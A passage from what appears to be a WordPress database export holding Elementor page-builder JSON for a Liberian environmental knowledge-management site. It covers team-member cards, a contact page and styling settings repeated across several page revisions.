\"right\":\"0\",\"bottom\":\"85\",\"left\":\"0\",\"isLinked\":false},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"_id\":\"997f017\"}]},\"elements\":[{\"id\":\"75f1af0a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"1eb2394d\",\"elType\":\"widget\",\"settings\":{\"member_image\":{\"id\":2313,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\"},\"member_first_name\":\"J.S. Datuama\",\"member_last_name\":\"Cammue\",\"member_position\":\"MEAs Officer\",\"member_description\":\"The Focal Point of the United Nations Convention on Biological Diversity\",\"social_list\":[{\"social_icon\":\"\",\"social_label\":\"\",\"social_link\":\"\",\"label_visible\":\"false\",\"_id\":\"fmh0jib\",\"selected_social_icon\":{\"value\":\"\",\"library\":\"\"}}],\"button_text\":\"Learn more\",\"first_name_typography_typography\":\"custom\",\"first_name_typography_font_size\":{\"unit\":\"px\",\"size\":20},\"first_name_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"last_name_typography_typography\":\"custom\",\"last_name_typography_font_size\":{\"unit\":\"px\",\"size\":20},\"name_margin\":{\"unit\":\"px\",\"top\":\"25\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"name_text_alignment\":\"left\",\"position_color\":\"#23ccc3\",\"position_typography_typography\":\"custom\",\"position_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"position_typography_font_style\":\"italic\",\"position_margin\":{\"unit\":\"px\",\"top\":\"4\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"position_alignment\":\"flex-start\",\"position_text_alignment\":\"right\",\"desc_color\":\"#000000\",\"desc_typography_typography\":\"custom\",\"desc_typography_font_size\":{\"unit\":\"px\",\"size\":16},\"desc_typography_font_family\":\"Roboto Condensed\",\"desc_typography_font_weight\":\"400\",\"desc_margin\":{\"unit\":\"px\",\"top\":\"8\",\"right\":\"0\",\"bottom\":\"3\",\"left\":\"0\",\"isLinked\":false},\"desc_text_alignment\":\"left\",\"button_alignment\":\"flex-start\",\"button_bg_color\":\"#23ccc3\",\"button_typography_typography\":\"custom\",\"button_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"button_typography_font_family\":\"Oswald\",\"button_typography_font_weight\":\"700\",\"button_typography_text_transform\":\"uppercase\",\"button_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"button_padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"30\",\"bottom\":\"19\",\"left\":\"30\",\"isLinked\":false},\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"primary_button_hover_bg_color\":\"#333333\",\"last_name_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"container_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"jet-team-member\"}],\"isInner\":false},{\"id\":\"29325d60\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7cf8d6a3\",\"elType\":\"widget\",\"settings\":{\"member_image\":{\"id\":\"\",\"url\":\"\"},\"member_first_name\":\"Berexford S\",\"member_last_name\":\"Jallah\",\"member_position\":\"GIS Supervisor\",\"member_description\":\"The Focal Point of the United Nations Convention to Combat Desertification\",\"social_list\":[{\"social_icon\":\"\",\"social_label\":\"\",\"social_link\":\"\",\"label_visible\":\"false\",\"_id\":\"fmh0jib\",\"selected_social_icon\":{\"value\":\"\",\"library\":\"\"}}],\"button_text\":\"Learn more\",\"first_name_typography_typography\":\"custom\",\"first_name_typography_font_size\":{\"unit\":\"px\",\"size\":20},\"first_name_typography_font_family\":\"Oswald\",\"first_name_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"last_name_typography_typography\":\"custom\",\"last_name_typography_font_size\":{\"unit\":\"px\",\"size\":20},\"last_name_typography_font_family\":\"Oswald\",\"name_margin\":{\"unit\":\"px\",\"top\":\"25\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"name_text_alignment\":\"left\",\"position_color\":\"#23ccc3\",\"position_typography_typography\":\"custom\",\"position_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"position_typography_font_family\":\"Roboto Condensed\",\"position_typography_font_style\":\"italic\",\"position_margin\":{\"unit\":\"px\",\"top\":\"4\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"position_alignment\":\"flex-start\",\"position_text_alignment\":\"right\",\"desc_color\":\"#777777\",\"desc_typography_typography\":\"custom\",\"desc_typography_font_size\":{\"unit\":\"px\",\"size\":16},\"desc_typography_font_family\":\"Roboto Condensed\",\"desc_typography_font_weight\":\"400\",\"desc_margin\":{\"unit\":\"px\",\"top\":\"8\",\"right\":\"0\",\"bottom\":\"3\",\"left\":\"0\",\"isLinked\":false},\"desc_text_alignment\":\"left\",\"button_alignment\":\"flex-start\",\"button_bg_color\":\"#23ccc3\",\"button_typography_typography\":\"custom\",\"button_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"button_typography_font_family\":\"Oswald\",\"button_typography_font_weight\":\"700\",\"button_typography_text_transform\":\"uppercase\",\"button_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"button_padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"30\",\"bottom\":\"19\",\"left\":\"30\",\"isLinked\":false},\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"primary_button_hover_bg_color\":\"#333333\",\"last_name_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"container_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"jet-team-member\"}],\"isInner\":false},{\"id\":\"5ac7adf5\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7fc35fde\",\"elType\":\"widget\",\"settings\":{\"member_image\":{\"id\":\"\",\"url\":\"\"},\"member_first_name\":\"Benjamin\",\"member_last_name\":\"Karmorh\",\"member_position\":\"Founder & CEO\",\"member_description\":\"Lorem ipsum dolor sit amet conse ctetur adipisicing elit, sed do eiusmod tempor incididunt.\",\"social_list\":[{\"social_icon\":\"\",\"social_label\":\"\",\"social_link\":\"\",\"label_visible\":\"false\",\"_id\":\"fmh0jib\",\"selected_social_icon\":{\"value\":\"\",\"library\":\"\"}}],\"button_text\":\"Learn more\",\"first_name_typography_typography\":\"custom\",\"first_name_typography_font_size\":{\"unit\":\"px\",\"size\":20},\"first_name_typography_font_family\":\"Oswald\",\"first_name_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"last_name_typography_typography\":\"custom\",\"last_name_typography_font_size\":{\"unit\":\"px\",\"size\":20},\"last_name_typography_font_family\":\"Oswald\",\"name_margin\":{\"unit\":\"px\",\"top\":\"25\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"name_text_alignment\":\"left\",\"position_color\":\"#23ccc3\",\"position_typography_typography\":\"custom\",\"position_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"position_typography_font_family\":\"Roboto Condensed\",\"position_typography_font_style\":\"italic\",\"position_margin\":{\"unit\":\"px\",\"top\":\"4\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"position_alignment\":\"flex-start\",\"position_text_alignment\":\"right\",\"desc_color\":\"#777777\",\"desc_typography_typography\":\"custom\",\"desc_typography_font_size\":{\"unit\":\"px\",\"size\":16},\"desc_typography_font_family\":\"Roboto Condensed\",\"desc_typography_font_weight\":\"400\",\"desc_margin\":{\"unit\":\"px\",\"top\":\"8\",\"right\":\"0\",\"bottom\":\"3\",\"left\":\"0\",\"isLinked\":false},\"desc_text_alignment\":\"left\",\"button_alignment\":\"left\",\"button_bg_color\":\"#23ccc3\",\"button_typography_typography\":\"custom\",\"button_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"button_typography_font_family\":\"Oswald\",\"button_typography_font_weight\":\"700\",\"button_typography_text_transform\":\"uppercase\",\"button_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"button_padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"30\",\"bottom\":\"19\",\"left\":\"30\",\"isLinked\":false},\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"primary_button_hover_bg_color\":\"#333333\",\"last_name_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"container_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"jet-team-member\"}],\"isInner\":false},{\"id\":\"b70c70a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"44e5b7f1\",\"elType\":\"widget\",\"settings\":{\"member_image\":{\"id\":\"\",\"url\":\"\"},\"member_first_name\":\"Tom\",\"member_last_name\":\"Allen\",\"member_position\":\"Founder & CEO\",\"member_description\":\"Lorem ipsum dolor sit amet conse ctetur adipisicing elit, sed do eiusmod tempor incididunt.\",\"social_list\":[{\"social_icon\":\"\",\"social_label\":\"\",\"social_link\":\"\",\"label_visible\":\"false\",\"_id\":\"fmh0jib\",\"selected_social_icon\":{\"value\":\"\",\"library\":\"\"}}],\"button_text\":\"Learn more\",\"first_name_typography_typography\":\"custom\",\"first_name_typography_font_size\":{\"unit\":\"px\",\"size\":20},\"first_name_typography_font_family\":\"Oswald\",\"first_name_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"last_name_typography_typography\":\"custom\",\"last_name_typography_font_size\":{\"unit\":\"px\",\"size\":20},\"last_name_typography_font_family\":\"Oswald\",\"name_margin\":{\"unit\":\"px\",\"top\":\"25\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"name_text_alignment\":\"left\",\"position_color\":\"#23ccc3\",\"position_typography_typography\":\"custom\",\"position_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"position_typography_font_family\":\"Roboto Condensed\",\"position_typography_font_style\":\"italic\",\"position_margin\":{\"unit\":\"px\",\"top\":\"4\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"position_alignment\":\"flex-start\",\"position_text_alignment\":\"right\",\"desc_color\":\"#777777\",\"desc_typography_typography\":\"custom\",\"desc_typography_font_size\":{\"unit\":\"px\",\"size\":16},\"desc_typography_font_family\":\"Roboto Condensed\",\"desc_typography_font_weight\":\"400\",\"desc_margin\":{\"unit\":\"px\",\"top\":\"8\",\"right\":\"0\",\"bottom\":\"3\",\"left\":\"0\",\"isLinked\":false},\"desc_text_alignment\":\"left\",\"button_alignment\":\"left\",\"button_bg_color\":\"#23ccc3\",\"button_typography_typography\":\"custom\",\"button_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"button_typography_font_family\":\"Oswald\",\"button_typography_font_weight\":\"700\",\"button_typography_text_transform\":\"uppercase\",\"button_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"button_padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"30\",\"bottom\":\"19\",\"left\":\"30\",\"isLinked\":false},\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"primary_button_hover_bg_color\":\"#333333\",\"last_name_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1}},\"elements\":[],\"widgetType\":\"jet-team-member\"}],\"isInner\":false}],\"isInner\":false}]'),(14636,2322,'_elementor_edit_mode','builder'),(14637,2322,'_elementor_template_type','wp-page'),(14638,2322,'_elementor_version','2.7.5'),(14639,2322,'_wp_page_template','default'),(14640,2322,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk.<\\/a>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"a3861ab\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"20\"},\"elements\":[{\"id\":\"65e4128\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"d8b2d45\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_manager_UV.jpg\",\"id\":2315},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"40\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"1255a43\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"b0aaead\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"40\"},\"elements\":[{\"id\":\"0aa0634\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"56a5d75\",\"elType\":\"widget\",\"settings\":{\"editor\":\"J.S. Datuama Cammue\\n<br>\\nMEAs Officer\\n<br>\\nThe Focal Point of the United Nations Convention on Biological Diversity\\n<br>\\n<a href=\\\"mailto:jcammue@epa.gov.lr>jcammue@epa.gov.lr<\\/a>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f847b48\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"509b314\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"cbbe26c\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(14644,2323,'_elementor_edit_mode','builder'),(14645,2323,'_elementor_template_type','wp-page'),(14646,2323,'_elementor_version','2.7.5'),(14647,2323,'_wp_page_template','default'),(14648,2323,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk.<\\/a>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"a3861ab\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"20\"},\"elements\":[{\"id\":\"65e4128\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"d8b2d45\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_manager_UV.jpg\",\"id\":2315},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"40\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"1255a43\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"b0aaead\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"40\"},\"elements\":[{\"id\":\"0aa0634\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"56a5d75\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><\\/p><p>MEAs Officer<\\/p><p>Focal Point of the United Nations Convention on Biological Diversity<\\/p><p><span style=\\\"color: #000000;\\\"><a style=\\\"color: #000000;\\\" href=\\\"&quot;mailto:jcammue@epa.gov.lr\\\">jcammue@epa.gov.lr<\\/a><\\/span><\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f847b48\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"509b314\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"cbbe26c\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(14652,2324,'_elementor_edit_mode','builder'),(14653,2324,'_elementor_template_type','wp-page'),(14654,2324,'_elementor_version','2.7.5'),(14655,2324,'_wp_page_template','default'),(14656,2324,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\